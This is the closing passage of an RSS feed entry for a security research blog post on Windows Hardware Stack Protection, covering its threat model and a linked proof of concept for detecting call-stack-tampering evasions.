<p>HSP was designed with an exploit mitigation threat model. It was never designed to defend against adversaries who have code execution, can change thread contexts, and perform system calls. In time, adversaries will adapt their call stack manipulations to manipulate the shadow stack as well. However, the fact that the shadow stack is user-RO and changing the SSP is privileged operation means that such tampering requires system calls which can (theoretically) be subjected to far more scrutiny than traditional stack tampering.</p>
<h1>Conclusion</h1>
<p>Today we discussed three potential benefits of Windows Hardware Stack Protection, and released <a href="https://github.com/gabriellandau/ShadowStackWalk">a PoC</a> demonstrating how it can be used to both detect and defeat defense evasions that manipulate the call stack.</p>
]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/kr/security-labs/assets/images/finding-truth-in-the-shadows/blog-thumb-laser-tunnel.jpg" length="0" type="image/jpg"/>
        </item>
    </channel>
</rss>